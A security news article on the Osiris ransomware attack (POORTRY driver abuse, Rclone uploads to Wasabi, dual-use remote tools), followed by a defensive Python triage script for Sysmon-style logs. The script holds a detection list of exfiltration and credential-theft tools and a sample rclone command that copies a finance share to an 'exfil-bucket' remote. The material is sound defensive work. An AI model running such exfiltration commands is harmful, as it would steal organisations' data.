Osiris Ransomware Attack Uses Malicious Driver to Bypass Endpoint Protection

Security researchers have revealed details about a new ransomware strain named Osiris, linked to an attack against a large food service franchisee operator in Southeast Asia in November 2025.

According to investigators from the Symantec and VMware Carbon Black Threat Hunter Team, the attackers used a powerful defense-evasion method known as Bring Your Own Vulnerable Driver (BYOVD), in which attackers load a kernel driver they brought with them and abuse it to gain kernel-level privileges and shut down security tools.

In this case, the attackers relied on a malicious driver called POORTRY, which played a key role in disabling endpoint protection before the ransomware was deployed.


This Osiris is not the older Osiris from 2016

Researchers emphasized that this Osiris ransomware appears to be a completely new family, unrelated to the older “Osiris” malware name that surfaced back in 2016 and was tied to Locky ransomware activity.

So far, the developers behind this newer ransomware remain unknown. It’s also unclear whether Osiris is being sold as a Ransomware-as-a-Service (RaaS) product or used privately by a specific group.


Possible link to INC ransomware operators

While there is no confirmed attribution yet, researchers found several indicators suggesting the threat actors may have connections to actors previously associated with INC ransomware (also known as Warble).

Key signs that raised suspicion include:

  • stolen data uploaded to Wasabi cloud storage
  • a Mimikatz variant using a filename seen before in INC-related intrusions (reported as kaz.exe)
  • broader overlap in tooling and tradecraft

These patterns suggest Osiris may be deployed by operators with experience in enterprise ransomware playbooks.


How Osiris encrypts systems

Researchers describe Osiris as an encryption payload built by skilled attackers. The ransomware uses:

  • hybrid encryption
  • unique encryption keys per file
  • configurable behavior (target folders/extensions)
  • the ability to stop services, kill processes, and drop ransom notes

By default, Osiris attempts to terminate a long list of processes and services tied to common enterprise software and recovery tools, including applications related to:

  • Microsoft Office and Exchange
  • browsers like Firefox
  • shadow copy mechanisms
  • backup platforms such as Veeam

This is designed to increase encryption impact and reduce recovery options.


Data theft came first: cloud exfiltration before encryption

Like many modern ransomware operations, Osiris was not only about encryption. The intrusion showed clear evidence of data exfiltration before ransomware execution, using:

  • Rclone
  • uploads into Wasabi cloud buckets

This follows the typical “double extortion” model: steal data first, then encrypt systems to force payment.


Living-off-the-land and dual-use tools used in the intrusion

The attackers didn’t rely on one payload alone. Investigators reported the use of multiple legitimate or dual-use tools, such as:

  • Netscan
  • NetExec
  • MeshAgent
  • a modified/custom version of RustDesk (remote desktop tool)

This approach makes detection harder, because many of these tools can also be used by IT administrators.


POORTRY driver: a BYOVD twist

The POORTRY driver is notable because it differs slightly from the classic BYOVD approach.

Traditional BYOVD involves taking a legitimate driver that has known vulnerabilities and using it to disable security tools.

POORTRY, however, appears to be purpose-built — designed specifically to:

  • gain elevated privileges
  • terminate defensive tools more aggressively

Researchers also observed another tool called KillAV, which is commonly used to bring in vulnerable drivers to kill endpoint security processes.

Additionally, RDP was enabled in the environment, likely giving the attackers a reliable channel for remote access.


Bigger picture: ransomware remains a major enterprise threat

This incident is part of a continuing surge in ransomware activity impacting businesses worldwide.

Threat researchers reported that ransomware operators claimed thousands of victims across 2025, showing that despite takedowns and disruptions, the ransomware ecosystem remains active and adaptable.

Major ransomware players in 2025 reportedly included groups such as:

  • Akira
  • Qilin
  • Play
  • INC
  • SafePay
  • RansomHub
  • DragonForce
  • Rhysida
  • CACTUS

Researchers also noted growing use of BYOVD tactics across multiple ransomware families — proving that driver-based defense bypass is becoming a standard tool in the ransomware arsenal.


Security recommendations

To reduce risk from similar targeted attacks, organizations should:

  • monitor for suspicious driver installation and kernel activity
  • detect unauthorized use of dual-use admin tools
  • restrict and tightly control RDP exposure
  • enforce MFA across privileged access
  • apply application allowlisting where possible
  • store backups securely (offline/immutable) and test restoration frequently
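The first two recommendations can be turned into a concrete triage pass. The following is an added example, not code from the article or the researchers: it runs over constructed Sysmon-style records (Event ID 6 Driver loaded, Event ID 1 Process Create), flags kernel drivers loaded from outside the normal Windows driver directories or without a valid signature, and flags executions of the dual-use tools the article names (the on-disk filenames for those tools, and the sample paths and bucket name, are assumptions).

```python
# Added example (not from the article or the researchers): triage over
# constructed Sysmon-style records, flagging kernel driver loads from outside the
# Windows driver directories or without a valid signature (the BYOVD pattern) and
# executions of the dual-use tools named above. Tool filenames are assumptions.
import re

DUAL_USE_TOOLS = {"rclone.exe", "netscan.exe", "nxc.exe", "netexec.exe",
                  "meshagent.exe", "rustdesk.exe", "kaz.exe"}  # assumed basenames
TRUSTED_DRIVER_DIRS = ("c:\\windows\\system32\\drivers\\",
                       "c:\\windows\\system32\\driverstore\\")  # normal driver locations

def check_driver_load(ev):
    """Reasons a Sysmon Event ID 6 (Driver loaded) record looks like a dropped or vulnerable driver."""
    reasons, path = [], ev.get("ImageLoaded", "").lower()
    if not path.startswith(TRUSTED_DRIVER_DIRS):
        reasons.append("driver loaded from unusual path: " + path)
    if ev.get("Signed", "").lower() != "true":
        reasons.append("driver image is not signed")
    elif ev.get("SignatureStatus", "").lower() != "valid":
        reasons.append("signature status " + ev.get("SignatureStatus", "missing"))
    return reasons

def check_process_create(ev):
    """Reasons a Sysmon Event ID 1 (Process Create) record looks like dual-use tooling or exfiltration."""
    image = ev.get("Image", "").lower().rsplit("\\", 1)[-1]
    reasons = ["dual-use tool executed: " + image] if image in DUAL_USE_TOOLS else []
    # rclone copy/sync/move to a named remote is the exfiltration step the article describes.
    if image == "rclone.exe" and re.search(r"\b(copy|sync|move)\b\s+\S+\s+\w+:",
                                           ev.get("CommandLine", "").lower()):
        reasons.append("rclone transfer to a configured remote")
    return reasons

def triage(events):
    """Return (EventID, image path, reasons) for every record that raised at least one reason."""
    checks = {6: check_driver_load, 1: check_process_create}
    hits = []
    for ev in events:
        reasons = checks.get(ev.get("EventID"), lambda _ev: [])(ev)
        if reasons:
            hits.append((ev["EventID"], ev.get("ImageLoaded") or ev.get("Image"), reasons))
    return hits

# Constructed sample records: a normal driver, a dropped driver, an rclone upload, a benign process.
SAMPLE_EVENTS = [
    {"EventID": 6, "ImageLoaded": r"C:\Windows\System32\drivers\tcpip.sys", "Signed": "true", "SignatureStatus": "Valid"},
    {"EventID": 6, "ImageLoaded": r"C:\Users\Public\drv.sys", "Signed": "true", "SignatureStatus": "Expired"},
    {"EventID": 1, "Image": r"C:\Temp\rclone.exe", "CommandLine": r"rclone.exe copy D:\Shares\Finance wasabi:exfil-bucket -P"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
]
```

Running `triage(SAMPLE_EVENTS)` returns two hits, the dropped driver and the rclone upload, while the stock driver and notepad pass clean; in practice the path and signature checks are a starting filter, and unexpected driver loads still need to be reviewed against the host's known driver inventory.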

Researchers also warned that extortion is evolving beyond classic encryption. Even “encryptionless” attacks and pure data theft campaigns are rising — meaning ransomware may increasingly become just one component of broader cyber extortion operations.